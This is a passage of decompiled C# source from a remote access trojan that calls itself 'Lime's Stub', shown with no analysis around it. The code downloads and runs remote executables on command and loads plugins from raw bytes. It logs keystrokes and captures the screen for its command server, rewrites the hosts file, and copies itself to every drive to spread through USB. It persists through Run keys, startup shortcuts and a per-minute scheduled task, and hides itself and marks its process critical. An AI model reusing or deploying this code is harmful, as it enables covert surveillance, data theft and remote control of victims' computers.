if (!Conversions.ToBoolean(NewLateBinding.LateGet(instance5, null, "IsInRole", new object[1]
{
WindowsBuiltInRole.Administrator
}, null, null, null)))
{
OK.Send("MSG" + OK.Y + "Lime's Stub is not running as administrator");
}
else
{
MyProject.Computer.FileSystem.WriteAllText("C:\\WINDOWS\\system32\\drivers\\etc\\hosts", "\r\n127.0.0.1 " + array[1], true);
}
}
break;
case 989868607u:
if (Operators.CompareString(text, "msgbox", false) == 0)
{
Interaction.MsgBox(array[1], MsgBoxStyle.Information, "Information");
}
break;
case 4171019001u:
if (Operators.CompareString(text, "antiproc", false) == 0)
{
MyAntiProcess.AutoAnti();
MyAntiProcess.Start();
}
break;
case 2513567945u:
if (Operators.CompareString(text, "antiprocstop", false) == 0)
{
MyAntiProcess.stopme();
MyAntiProcess.XAnti();
}
break;
case 2648296626u:
if (Operators.CompareString(text, "spreadusbme", false) == 0)
{
try
{
string programFiles = MyProject.Computer.FileSystem.SpecialDirectories.ProgramFiles;
string[] logicalDrives = Directory.GetLogicalDrives();
string[] array9 = logicalDrives;
foreach (string programFiles in array9)
{
try
{
if (!File.Exists(programFiles + OK.RG))
{
File.Copy(Assembly.GetExecutingAssembly().Location, programFiles + OK.RG);
}
}
catch (Exception projectError)
{
ProjectData.SetProjectError(projectError);
ProjectData.ClearProjectError();
}
}
}
catch (Exception projectError2)
{
ProjectData.SetProjectError(projectError2);
ProjectData.ClearProjectError();
}
}
break;
case 2052932546u:
if (Operators.CompareString(text, "restartme", false) == 0)
{
Interaction.Shell("shutdown -r -t 00 -f", AppWinStyle.Hide, false, -1);
}
break;
case 2502785813u:
if (Operators.CompareString(text, "shutdownme", false) == 0)
{
Interaction.Shell("shutdown -s -t 00 -f", AppWinStyle.Hide, false, -1);
}
break;
case 3917606159u:
if (Operators.CompareString(text, "botk", false) == 0)
{
BotKillers.RunStandardBotKiller();
OK.Send("MSG" + OK.Y + "Ran Malware Killer");
}
break;
case 547083341u:
if (Operators.CompareString(text, "TextToSpeech", false) == 0)
{
object objectValue = RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(Interaction.CreateObject("SAPI.Spvoice", "")));
object objectValue2 = RuntimeHelpers.GetObjectValue(objectValue);
Type type = null;
string memberName = "speak";
object[] array3 = new object[1];
object[] array4 = array3;
int num = 0;
string[] array5 = array;
string[] array6 = array5;
int num2 = 1;
array4[num] = array6[num2];
object[] array7 = array3;
object[] arguments = array7;
string[] argumentNames = null;
Type[] typeArguments = null;
bool[] array8 = new bool[1]
{
true
};
NewLateBinding.LateCall(RuntimeHelpers.GetObjectValue(objectValue2), type, memberName, arguments, argumentNames, typeArguments, array8, true);
if (array8[0])
{
array5[num2] = Conversions.ToString(Conversions.ChangeType(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(array7[0])), typeof(string)));
}
}
break;
case 1160889637u:
if (Operators.CompareString(text, "ll", false) == 0)
{
OK.Cn = false;
return;
}
break;
case 1128069874u:
if (Operators.CompareString(text, "kl", false) == 0)
{
OK.Send("kl" + OK.Y + OK.ENB(ref OK.kq.Logs));
return;
}
break;
case 4013831322u:
if (Operators.CompareString(text, "prof", false) == 0)
{
string left = array[1];
if (Operators.CompareString(left, "~", false) != 0)
{
if (Operators.CompareString(left, "!", false) != 0)
{
if (Operators.CompareString(left, "@", false) == 0)
{
OK.DLV(array[2]);
}
}
else
{
OK.STV(array[2], array[3], RegistryValueKind.String);
OK.Send(Conversions.ToString(RuntimeHelpers.GetObjectValue(Operators.ConcatenateObject("getvalue" + OK.Y + array[1] + OK.Y, RuntimeHelpers.GetObjectValue(OK.GTV(array[1], ""))))));
}
}
else
{
OK.STV(array[2], array[3], RegistryValueKind.String);
}
return;
}
break;
}
checked
{
if (Operators.CompareString(text, "rn", false) == 0)
{
byte[] bytes;
if (array[2][0] == '\u001f')
{
try
{
MemoryStream memoryStream = new MemoryStream();
int length = (array[0] + OK.Y + array[1] + OK.Y).Length;
memoryStream.Write(b, length, b.Length - length);
bytes = OK.ZIP(memoryStream.ToArray());
}
catch (Exception ex3)
{
ProjectData.SetProjectError(ex3);
Exception ex4 = ex3;
ProjectData.SetProjectError(ex4);
Exception ex5 = ex4;
OK.Send("MSG" + OK.Y + "Execute ERROR");
OK.Send("bla");
ProjectData.ClearProjectError();
ProjectData.ClearProjectError();
return;
}
}
else
{
WebClient webClient = new WebClient();
try
{
bytes = webClient.DownloadData(array[2]);
}
catch (Exception ex6)
{
ProjectData.SetProjectError(ex6);
Exception ex7 = ex6;
ProjectData.SetProjectError(ex7);
Exception ex8 = ex7;
OK.Send("MSG" + OK.Y + "Download ERROR");
OK.Send("bla");
ProjectData.ClearProjectError();
ProjectData.ClearProjectError();
return;
}
}
OK.Send("bla");
string text6 = Path.GetTempFileName() + "." + array[1];
try
{
File.WriteAllBytes(text6, bytes);
Process.Start(text6);
OK.Send("MSG" + OK.Y + "Executed As " + new FileInfo(text6).Name);
}
catch (Exception ex9)
{
ProjectData.SetProjectError(ex9);
Exception ex10 = ex9;
ProjectData.SetProjectError(ex10);
Exception ex11 = ex10;
OK.Send("MSG" + OK.Y + "Execute ERROR " + ex11.Message);
ProjectData.ClearProjectError();
ProjectData.ClearProjectError();
}
}
else if (Operators.CompareString(text, "inv", false) != 0)
{
string text8;
if (Operators.CompareString(text, "ret", false) != 0)
{
if (Operators.CompareString(text, "CAP", false) != 0)
{
if (Operators.CompareString(text, "un", false) == 0)
{
string left2 = array[1];
if (Operators.CompareString(left2, "~", false) != 0)
{
if (Operators.CompareString(left2, "!", false) != 0)
{
if (Operators.CompareString(left2, "@", false) == 0)
{
OK.pr(0);
Process.Start(OK.LO.FullName);
ProjectData.EndApp();
}
}
else
{
OK.pr(0);
ProjectData.EndApp();
}
}
else
{
OK.UNS();
}
}
else if (Operators.CompareString(text, "up", false) == 0)
{
byte[] array10 = null;
if (array[1][0] == '\u001f')
{
try
{
MemoryStream memoryStream2 = new MemoryStream();
int length2 = (array[0] + OK.Y).Length;
memoryStream2.Write(b, length2, b.Length - length2);
array10 = OK.ZIP(memoryStream2.ToArray());
}
catch (Exception ex12)
{
ProjectData.SetProjectError(ex12);
Exception ex13 = ex12;
ProjectData.SetProjectError(ex13);
Exception ex14 = ex13;
OK.Send("MSG" + OK.Y + "Update ERROR");
OK.Send("bla");
ProjectData.ClearProjectError();
ProjectData.ClearProjectError();
return;
}
}
else
{
WebClient webClient2 = new WebClient();
try
{
array10 = webClient2.DownloadData(array[1]);
}
catch (Exception ex15)
{
ProjectData.SetProjectError(ex15);
Exception ex16 = ex15;
ProjectData.SetProjectError(ex16);
Exception ex17 = ex16;
OK.Send("MSG" + OK.Y + "Update ERROR");
OK.Send("bla");
ProjectData.ClearProjectError();
ProjectData.ClearProjectError();
return;
}
}
OK.Send("bla");
string text7 = Path.GetTempFileName() + ".exe";
try
{
OK.Send("MSG" + OK.Y + "Updating To " + new FileInfo(text7).Name);
Thread.Sleep(2000);
File.WriteAllBytes(text7, array10);
Process.Start(text7, "..");
}
catch (Exception ex18)
{
ProjectData.SetProjectError(ex18);
Exception ex19 = ex18;
ProjectData.SetProjectError(ex19);
Exception ex20 = ex19;
OK.Send("MSG" + OK.Y + "Update ERROR " + ex20.Message);
ProjectData.ClearProjectError();
ProjectData.ClearProjectError();
return;
}
OK.UNS();
}
else
{
if (Operators.CompareString(text, "Ex", false) == 0)
{
if (OK.PLG == null)
{
OK.Send("PLG");
int num3 = 0;
while (!(OK.PLG != null | num3 == 20 | !OK.Cn))
{
num3++;
Thread.Sleep(1000);
}
if (!(OK.PLG == null | !OK.Cn))
{
goto IL_18fd;
}
goto end_IL_0015;
}
goto IL_18fd;
}
if (Operators.CompareString(text, "PLG", false) == 0)
{
MemoryStream memoryStream3 = new MemoryStream();
int length3 = (array[0] + OK.Y).Length;
memoryStream3.Write(b, length3, b.Length - length3);
OK.PLG = RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(OK.Plugin(OK.ZIP(memoryStream3.ToArray()), "A")));
NewLateBinding.LateSet(RuntimeHelpers.GetObjectValue(OK.PLG), null, "H", new object[1]
{
OK.H
}, null, null);
NewLateBinding.LateSet(RuntimeHelpers.GetObjectValue(OK.PLG), null, "P", new object[1]
{
OK.P
}, null, null);
NewLateBinding.LateSet(RuntimeHelpers.GetObjectValue(OK.PLG), null, "c", new object[1]
{
OK.C
}, null, null);
}
}
}
else
{
Rectangle targetRect = Screen.PrimaryScreen.Bounds;
Bitmap bitmap = new Bitmap(Screen.PrimaryScreen.Bounds.Width, targetRect.Height, PixelFormat.Format16bppRgb555);
Graphics graphics = Graphics.FromImage(bitmap);
Size blockRegionSize = new Size(bitmap.Width, bitmap.Height);
graphics.CopyFromScreen(0, 0, 0, 0, blockRegionSize, CopyPixelOperation.SourceCopy);
try
{
blockRegionSize = new Size(32, 32);
targetRect = new Rectangle(Cursor.Position, blockRegionSize);
Cursors.Default.Draw(graphics, targetRect);
}
catch (Exception ex21)
{
ProjectData.SetProjectError(ex21);
Exception ex22 = ex21;
ProjectData.SetProjectError(ex22);
Exception ex23 = ex22;
ProjectData.ClearProjectError();
ProjectData.ClearProjectError();
}
graphics.Dispose();
Bitmap bitmap2 = new Bitmap(Conversions.ToInteger(array[1]), Conversions.ToInteger(array[2]));
graphics = Graphics.FromImage(bitmap2);
graphics.DrawImage(bitmap, 0, 0, bitmap2.Width, bitmap2.Height);
graphics.Dispose();
MemoryStream memoryStream4 = new MemoryStream();
text8 = "CAP" + OK.Y;
b = OK.SB(ref text8);
memoryStream4.Write(b, 0, b.Length);
MemoryStream memoryStream5 = new MemoryStream();
bitmap2.Save(memoryStream5, ImageFormat.Jpeg);
string left3 = OK.md5(memoryStream5.ToArray());
if (Operators.CompareString(left3, OK.lastcap, false) != 0)
{
OK.lastcap = left3;
memoryStream4.Write(memoryStream5.ToArray(), 0, (int)memoryStream5.Length);
}
else
{
memoryStream4.WriteByte(0);
}
OK.Sendb(memoryStream4.ToArray());
memoryStream4.Dispose();
memoryStream5.Dispose();
bitmap.Dispose();
bitmap2.Dispose();
}
}
else
{
byte[] array11 = unchecked((byte[])OK.GTV(array[1], new byte[0]));
if (array[2].Length < 10 & array11.Length == 0)
{
OK.Send("pl" + OK.Y + array[1] + OK.Y + Conversions.ToString(1));
}
else
{
if (array[2].Length > 10)
{
MemoryStream memoryStream6 = new MemoryStream();
int length4 = (array[0] + OK.Y + array[1] + OK.Y).Length;
memoryStream6.Write(b, length4, b.Length - length4);
array11 = OK.ZIP(memoryStream6.ToArray());
OK.STV(array[1], array11, RegistryValueKind.Binary);
}
OK.Send("pl" + OK.Y + array[1] + OK.Y + Conversions.ToString(0));
object objectValue3 = RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(OK.Plugin(array11, "A")));
string[] obj = new string[5]
{
"ret",
OK.Y,
array[1],
OK.Y,
null
};
text8 = Conversions.ToString(RuntimeHelpers.GetObjectValue(NewLateBinding.LateGet(RuntimeHelpers.GetObjectValue(objectValue3), null, "GT", new object[0], null, null, null)));
obj[4] = OK.ENB(ref text8);
OK.Send(string.Concat(obj));
}
}
}
else
{
byte[] array12 = unchecked((byte[])OK.GTV(array[1], new byte[0]));
if (array[3].Length < 10 & array12.Length == 0)
{
OK.Send("pl" + OK.Y + array[1] + OK.Y + Conversions.ToString(1));
}
else
{
if (array[3].Length > 10)
{
MemoryStream memoryStream7 = new MemoryStream();
int length5 = (array[0] + OK.Y + array[1] + OK.Y + array[2] + OK.Y).Length;
memoryStream7.Write(b, length5, b.Length - length5);
array12 = OK.ZIP(memoryStream7.ToArray());
OK.STV(array[1], array12, RegistryValueKind.Binary);
}
OK.Send("pl" + OK.Y + array[1] + OK.Y + Conversions.ToString(0));
object objectValue4 = RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(OK.Plugin(array12, "A")));
NewLateBinding.LateSet(RuntimeHelpers.GetObjectValue(objectValue4), null, "h", new object[1]
{
OK.H
}, null, null);
NewLateBinding.LateSet(RuntimeHelpers.GetObjectValue(objectValue4), null, "p", new object[1]
{
OK.P
}, null, null);
NewLateBinding.LateSet(RuntimeHelpers.GetObjectValue(objectValue4), null, "osk", new object[1]
{
array[2]
}, null, null);
NewLateBinding.LateCall(RuntimeHelpers.GetObjectValue(objectValue4), null, "start", new object[0], null, null, null, true);
while (!Conversions.ToBoolean(RuntimeHelpers.GetObjectValue(Operators.OrObject(!OK.Cn, RuntimeHelpers.GetObjectValue(Operators.CompareObjectEqual(RuntimeHelpers.GetObjectValue(NewLateBinding.LateGet(RuntimeHelpers.GetObjectValue(objectValue4), null, "Off", new object[0], null, null, null)), true, false))))))
{
Thread.Sleep(1);
}
NewLateBinding.LateSet(RuntimeHelpers.GetObjectValue(objectValue4), null, "off", new object[1]
{
true
}, null, null);
}
}
goto end_IL_0015;
}
IL_18fd:
object[] array13 = new object[1]
{
b
};
bool[] array14 = new bool[1]
{
true
};
NewLateBinding.LateCall(RuntimeHelpers.GetObjectValue(OK.PLG), null, "ind", array13, null, null, array14, true);
if (array14[0])
{
b = (byte[])Conversions.ChangeType(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(array13[0])), typeof(byte[]));
}
end_IL_0015:;
}
catch (Exception ex24)
{
ProjectData.SetProjectError(ex24);
Exception ex25 = ex24;
ProjectData.SetProjectError(ex25);
Exception ex26 = ex25;
if (array.Length > 0 && (Operators.CompareString(array[0], "Ex", false) == 0 | Operators.CompareString(array[0], "PLG", false) == 0))
{
OK.PLG = null;
}
try
{
OK.Send("ER" + OK.Y + array[0] + OK.Y + ex26.Message);
}
catch (Exception ex27)
{
ProjectData.SetProjectError(ex27);
Exception ex28 = ex27;
ProjectData.SetProjectError(ex28);
Exception ex29 = ex28;
ProjectData.ClearProjectError();
ProjectData.ClearProjectError();
}
ProjectData.ClearProjectError();
ProjectData.ClearProjectError();
}
}
public static string inf()
{
string text = "ll" + OK.Y;
string text2;
try
{
if (Operators.ConditionalCompareObjectEqual(RuntimeHelpers.GetObjectValue(OK.GTV("vn", "")), "", false))
{
string str = text;
text2 = OK.DEB(ref OK.VN) + "_" + OK.HWD();
text = str + OK.ENB(ref text2) + OK.Y;
}
else
{
string str2 = text;
string text3 = Conversions.ToString(RuntimeHelpers.GetObjectValue(OK.GTV("vn", "")));
text2 = OK.DEB(ref text3) + "_" + OK.HWD();
text = str2 + OK.ENB(ref text2) + OK.Y;
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
Exception ex2 = ex;
ProjectData.SetProjectError(ex2);
Exception ex3 = ex2;
string str3 = text;
text2 = OK.HWD();
text = str3 + OK.ENB(ref text2) + OK.Y;
ProjectData.ClearProjectError();
ProjectData.ClearProjectError();
}
try
{
text = text + Environment.MachineName + OK.Y;
}
catch (Exception ex4)
{
ProjectData.SetProjectError(ex4);
Exception ex5 = ex4;
ProjectData.SetProjectError(ex5);
Exception ex6 = ex5;
text = text + "??" + OK.Y;
ProjectData.ClearProjectError();
ProjectData.ClearProjectError();
}
try
{
text = text + Environment.UserName + OK.Y;
}
catch (Exception ex7)
{
ProjectData.SetProjectError(ex7);
Exception ex8 = ex7;
ProjectData.SetProjectError(ex8);
Exception ex9 = ex8;
text = text + "??" + OK.Y;
ProjectData.ClearProjectError();
ProjectData.ClearProjectError();
}
try
{
string str4 = text;
DateTime dateTime = OK.LO.LastWriteTime;
dateTime = dateTime.Date;
text = str4 + dateTime.ToString("yy-MM-dd") + OK.Y;
}
catch (Exception ex10)
{
ProjectData.SetProjectError(ex10);
Exception ex11 = ex10;
ProjectData.SetProjectError(ex11);
Exception ex12 = ex11;
text = text + "??-??-??" + OK.Y;
ProjectData.ClearProjectError();
ProjectData.ClearProjectError();
}
text += OK.Y;
try
{
text += OK.F.Info.OSFullName.Replace("Microsoft", "").Replace("Windows", "Win").Replace("®", "")
.Replace("™", "")
.Replace(" ", " ")
.Replace(" Win", "Win");
}
catch (Exception ex13)
{
ProjectData.SetProjectError(ex13);
Exception ex14 = ex13;
ProjectData.SetProjectError(ex14);
Exception ex15 = ex14;
text += "??";
ProjectData.ClearProjectError();
ProjectData.ClearProjectError();
}
text += "SP";
try
{
string[] array = Strings.Split(Environment.OSVersion.ServicePack, " ", -1, CompareMethod.Binary);
if (array.Length == 1)
{
text += "0";
}
text += array[checked(array.Length - 1)];
}
catch (Exception ex16)
{
ProjectData.SetProjectError(ex16);
Exception ex17 = ex16;
ProjectData.SetProjectError(ex17);
Exception ex18 = ex17;
text += "0";
ProjectData.ClearProjectError();
ProjectData.ClearProjectError();
}
try
{
text = ((!Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles).Contains("x86")) ? (text + " x86" + OK.Y) : (text + " x64" + OK.Y));
}
catch (Exception ex19)
{
ProjectData.SetProjectError(ex19);
Exception ex20 = ex19;
ProjectData.SetProjectError(ex20);
Exception ex21 = ex20;
text += OK.Y;
ProjectData.ClearProjectError();
ProjectData.ClearProjectError();
}
text = ((!OK.Cam()) ? (text + "No" + OK.Y) : (text + "Yes" + OK.Y));
text = text + OK.GetAntiVirus() + OK.Y + OK.GetAntiVirus() + OK.Y + OK.GetAntiVirus() + OK.Y;
string text4 = "";
try
{
string[] valueNames = OK.F.Registry.CurrentUser.CreateSubKey("Software\\" + OK.RG, RegistryKeyPermissionCheck.Default).GetValueNames();
foreach (string text5 in valueNames)
{
if (text5.Length == 32)
{
text4 = text4 + text5 + ",";
}
}
}
catch (Exception ex22)
{
ProjectData.SetProjectError(ex22);
Exception ex23 = ex22;
ProjectData.SetProjectError(ex23);
Exception ex24 = ex23;
ProjectData.ClearProjectError();
ProjectData.ClearProjectError();
}
return text + text4;
}
[MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
public static void INS()
{
Thread.Sleep(1000);
if (OK.Idr && !OK.CompDir(OK.LO, new FileInfo(Interaction.Environ(OK.DR).ToLower() + "\\" + OK.EXE.ToLower())))
{
try
{
if (File.Exists(Interaction.Environ(OK.DR) + "\\" + OK.EXE))
{
File.Delete(Interaction.Environ(OK.DR) + "\\" + OK.EXE);
}
FileStream fileStream = new FileStream(Interaction.Environ(OK.DR) + "\\" + OK.EXE, FileMode.CreateNew);
byte[] array = File.ReadAllBytes(OK.LO.FullName);
fileStream.Write(array, 0, array.Length);
fileStream.Flush();
fileStream.Close();
OK.LO = new FileInfo(Interaction.Environ(OK.DR) + "\\" + OK.EXE);
Process.Start(OK.LO.FullName);
ProjectData.EndApp();
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
Exception ex2 = ex;
ProjectData.SetProjectError(ex2);
Exception ex3 = ex2;
ProjectData.EndApp();
ProjectData.ClearProjectError();
ProjectData.ClearProjectError();
}
}
try
{
Environment.SetEnvironmentVariable("SEE_MASK_NOZONECHECKS", "1", EnvironmentVariableTarget.User);
}
catch (Exception ex4)
{
ProjectData.SetProjectError(ex4);
Exception ex5 = ex4;
ProjectData.SetProjectError(ex5);
Exception ex6 = ex5;
ProjectData.ClearProjectError();
ProjectData.ClearProjectError();
}
if (OK.Isu)
{
try
{
OK.F.Registry.CurrentUser.OpenSubKey(OK.sf, true).SetValue(OK.RG, "\"" + OK.LO.FullName + "\" ..");
}
catch (Exception ex7)
{
ProjectData.SetProjectError(ex7);
Exception ex8 = ex7;
ProjectData.SetProjectError(ex8);
Exception ex9 = ex8;
ProjectData.ClearProjectError();
ProjectData.ClearProjectError();
}
try
{
OK.F.Registry.LocalMachine.OpenSubKey(OK.sf, true).SetValue(OK.RG, "\"" + OK.LO.FullName + "\" ..");
}
catch (Exception ex10)
{
ProjectData.SetProjectError(ex10);
Exception ex11 = ex10;
ProjectData.SetProjectError(ex11);
Exception ex12 = ex11;
ProjectData.ClearProjectError();
ProjectData.ClearProjectError();
}
}
if (OK.IsF)
{
try
{
if (File.Exists(Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "\\" + OK.RG))
{
File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "\\" + OK.RG);
}
File.Copy(OK.LO.FullName, Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "\\" + OK.RG, true);
string fileNameWithoutExtension = Path.GetFileNameWithoutExtension(Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "\\" + OK.RG);
string str = fileNameWithoutExtension;
if (File.Exists(Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "\\" + str + ".url"))
{
File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "\\" + str + ".url");
}
string text = Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "\\" + OK.RG;
string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.Startup);
object obj = new StreamWriter(folderPath + "\\" + str + ".url");
try
{
File.SetAttributes(text, FileAttributes.Hidden);
NewLateBinding.LateCall(obj, null, "WriteLine", new object[1]
{
"[InternetShortcut]"
}, null, null, null, true);
NewLateBinding.LateCall(obj, null, "WriteLine", new object[1]
{
"URL=file:///" + text
}, null, null, null, true);
NewLateBinding.LateCall(obj, null, "WriteLine", new object[1]
{
"IconIndex=17"
}, null, null, null, true);
NewLateBinding.LateCall(obj, null, "WriteLine", new object[1]
{
"IconFile=C:\\Windows\\system32\\SHELL32.dll"
}, null, null, null, true);
NewLateBinding.LateCall(obj, null, "Flush", new object[0], null, null, null, true);
}
finally
{
if (obj != null)
{
((IDisposable)obj).Dispose();
}
}
if (Conversions.ToBoolean(OK.HIDE_ME))
{
File.SetAttributes(Application.ExecutablePath, FileAttributes.Hidden);
}
}
catch (Exception ex13)
{
ProjectData.SetProjectError(ex13);
Exception ex14 = ex13;
ProjectData.SetProjectError(ex14);
Exception ex15 = ex14;
ProjectData.ClearProjectError();
ProjectData.ClearProjectError();
}
}
}
[MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
public static void ko()
{
checked
{
Thread.Sleep((int)Math.Round(Math.Round(Math.Round(unchecked(Conversions.ToDouble(OK.SLP) * 1000.0)))));
if (OK.Anti_CH)
{
try
{
MyAntiProcess.Start();
}
catch (Exception projectError)
{
ProjectData.SetProjectError(projectError);
ProjectData.ClearProjectError();
}
}
if (OK.BOT_KILL)
{
try
{
BotKillers.RunStandardBotKiller();
Thread.Sleep(50);
}
catch (Exception projectError2)
{
ProjectData.SetProjectError(projectError2);
ProjectData.ClearProjectError();
}
}
if (OK.USB_SP)
{
try
{
string programFiles = MyProject.Computer.FileSystem.SpecialDirectories.ProgramFiles;
string[] logicalDrives = Directory.GetLogicalDrives();
string[] array = logicalDrives;
foreach (string programFiles in array)
{
try
{
if (!File.Exists(programFiles + OK.RG))
{
File.Copy(Assembly.GetExecutingAssembly().Location, programFiles + OK.RG);
}
}
catch (Exception projectError3)
{
ProjectData.SetProjectError(projectError3);
ProjectData.ClearProjectError();
}
}
}
catch (Exception projectError4)
{
ProjectData.SetProjectError(projectError4);
ProjectData.ClearProjectError();
}
}
if (OK.Persis)
{
try
{
object executablePath = Application.ExecutablePath;
Interaction.Shell(Conversions.ToString(Operators.ConcatenateObject(Operators.ConcatenateObject("schtasks /create /tn NYAN /tr \"", executablePath), "\" /sc minute /mo 1")), AppWinStyle.Hide, false, -1);
}
catch (Exception projectError5)
{
ProjectData.SetProjectError(projectError5);
ProjectData.ClearProjectError();
}
}
if (Interaction.Command() != null)
{
try
{
OK.F.Registry.CurrentUser.SetValue("di", "!");
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
Exception ex2 = ex;
ProjectData.SetProjectError(ex2);
Exception ex3 = ex2;
ProjectData.ClearProjectError();
ProjectData.ClearProjectError();
}
Thread.Sleep(5000);
}
bool flag = false;
OK.MT = new Mutex(true, OK.RG, out flag);
if (!flag)
{
ProjectData.EndApp();
}
OK.INS();
if (!OK.Idr)
{
OK.EXE = OK.LO.Name;
OK.DR = OK.LO.Directory.Name;
}
Thread thread = new Thread(OK.RC, 1);
thread.Start();
try
{
OK.kq = new kl();
Thread thread2 = new Thread(OK.kq.WRK, 1);
thread2.Start();
}
catch (Exception ex4)
{
ProjectData.SetProjectError(ex4);
Exception ex5 = ex4;
ProjectData.SetProjectError(ex5);
Exception ex6 = ex5;
ProjectData.ClearProjectError();
ProjectData.ClearProjectError();
}
int num = 0;
string left = "";
if (OK.BD)
{
try
{
SystemEvents.SessionEnding += OK._Lambda__2;
OK.pr(1);
}
catch (Exception ex7)
{
ProjectData.SetProjectError(ex7);
Exception ex8 = ex7;
ProjectData.SetProjectError(ex8);
Exception ex9 = ex8;
ProjectData.ClearProjectError();
ProjectData.ClearProjectError();
}
}
while (true)
{
Thread.Sleep(1000);
if (!OK.Cn)
{
left = "";
}
Application.DoEvents();
try
{
num++;
if (num == 5)
{
try
{
Process.GetCurrentProcess().MinWorkingSet = (IntPtr)1024;
}
catch (Exception ex10)
{
ProjectData.SetProjectError(ex10);
Exception ex11 = ex10;
ProjectData.SetProjectError(ex11);
Exception ex12 = ex11;
ProjectData.ClearProjectError();
ProjectData.ClearProjectError();
}
}
if (num >= 8)
{
num = 0;
string text = OK.ACT();
if (Operators.CompareString(left, text, false) != 0)
{
left = text;
OK.Send("act" + OK.Y + text);
}
}
if (OK.Isu)
{
try
{
if (Operators.ConditionalCompareObjectNotEqual(RuntimeHelpers.GetObjectValue(OK.F.Registry.CurrentUser.GetValue(OK.sf + "\\" + OK.RG, "")), "\"" + OK.LO.FullName + "\" ..", false))
{
OK.F.Registry.CurrentUser.OpenSubKey(OK.sf, true).SetValue(OK.RG, "\"" + OK.LO.FullName + "\" ..");
}
}
catch (Exception ex13)
{
ProjectData.SetProjectError(ex13);
Exception ex14 = ex13;
ProjectData.SetProjectError(ex14);
Exception ex15 = ex14;
ProjectData.ClearProjectError();
ProjectData.ClearProjectError();
}
try
{
if (Operators.ConditionalCompareObjectNotEqual(RuntimeHelpers.GetObjectValue(OK.F.Registry.LocalMachine.GetValue(OK.sf + "\\" + OK.RG, "")), "\"" + OK.LO.FullName + "\" ..", false))
{
OK.F.Registry.LocalMachine.OpenSubKey(OK.sf, true).SetValue(OK.RG, "\"" + OK.LO.FullName + "\" ..");
}
}
catch (Exception ex16)
{
ProjectData.SetProjectError(ex16);
Exception ex17 = ex16;
ProjectData.SetProjectError(ex17);
Exception ex18 = ex17;
ProjectData.ClearProjectError();
ProjectData.ClearProjectError();
}
}
}
catch (Exception ex19)
{
ProjectData.SetProjectError(ex19);
Exception ex20 = ex19;
ProjectData.SetProjectError(ex20);
Exception ex21 = ex20;
ProjectData.ClearProjectError();
ProjectData.ClearProjectError();
}
}
}
}
public static string md5(byte[] B)
{
B = new MD5CryptoServiceProvider().ComputeHash(B);
string text = "";
byte[] array = B;
for (int i = 0; i < array.Length; i = checked(i + 1))
{
byte b = array[i];
text += b.ToString("x2");
}
return text;
}
[DllImport("ntdll")]
private static extern int NtSetInformationProcess(IntPtr hProcess, int processInformationClass, ref int processInformation, int processInformationLength);
public static object Plugin(byte[] b, string c)
{
Module[] modules = Assembly.Load(b).GetModules();
foreach (Module module in modules)
{
Type[] types = module.GetTypes();
foreach (Type type in types)
{
if (type.FullName.EndsWith("." + c))
{
return module.Assembly.CreateInstance(type.FullName);
}
}
}
return null;
}
public static void pr(int i)
{
try
{
OK.NtSetInformationProcess(Process.GetCurrentProcess().Handle, 29, ref i, 4);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
Exception ex2 = ex;
ProjectData.SetProjectError(ex2);
Exception ex3 = ex2;
ProjectData.ClearProjectError();
ProjectData.ClearProjectError();
}
}
public static void RC()
{
checked
{
while (true)
{
OK.lastcap = "";
if (OK.C != null)
{
long num = -1L;
int num2 = 0;
try
{
while (true)
{
IL_0021:
num2++;
if (num2 == 10)
{
num2 = 0;
Thread.Sleep(1);
}
if (OK.Cn)
{
if (OK.C.Available < 1)
{
OK.C.Client.Poll(-1, SelectMode.SelectRead);
}
while (true)
{
if (OK.C.Available <= 0)
{
break;
}
string text;
if (num == -1)
{
text = "";
while (true)
{
int num3 = OK.C.GetStream().ReadByte();
switch (num3)
{
case -1:
break;
case 0:
goto IL_00cb;
default:
text += Conversions.ToString(Conversions.ToInteger(Strings.ChrW(num3).ToString()));
continue;
}
break;
}
break;
}
OK.b = new byte[OK.C.Available + 1 - 1 + 1];
long num4 = num - OK.MeM.Length;
if (OK.b.Length > num4)
{
OK.b = new byte[(int)(num4 - 1) + 1 - 1 + 1];
}
int count = OK.C.Client.Receive(OK.b, 0, OK.b.Length, SocketFlags.None);
OK.MeM.Write(OK.b, 0, count);
if (OK.MeM.Length == num)
{
num = -1L;
Thread thread = new Thread(OK._Lambda__1, 1);
thread.Start(OK.MeM.ToArray());
thread.Join(100);
OK.MeM.Dispose();
OK.MeM = new MemoryStream();
}
goto IL_0021;
IL_00cb:
num = Conversions.ToLong(text);
text = "";
if (num == 0)
{
OK.Send("");
num = -1L;
}
if (OK.C.Available <= 0)
{
goto IL_0021;
}
}
}
break;
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
Exception ex2 = ex;
ProjectData.SetProjectError(ex2);
Exception ex3 = ex2;
ProjectData.ClearProjectError();
ProjectData.ClearProjectError();
}
}
do
{
try
{
if (OK.PLG != null)
{
NewLateBinding.LateCall(RuntimeHelpers.GetObjectValue(OK.PLG), null, "clear", new object[0], null, null, null, true);
OK.PLG = null;
}
}
catch (Exception ex4)
{
ProjectData.SetProjectError(ex4);
Exception ex5 = ex4;
ProjectData.SetProjectError(ex5);
Exception ex6 = ex5;
ProjectData.ClearProjectError();
ProjectData.ClearProjectError();
}
OK.Cn = false;
}
while (!OK.connect());
OK.Cn = true;
}
}
}
public static byte[] SB(ref string S)
{
return Encoding.UTF8.GetBytes(S);
}
public static bool Send(string S)
{
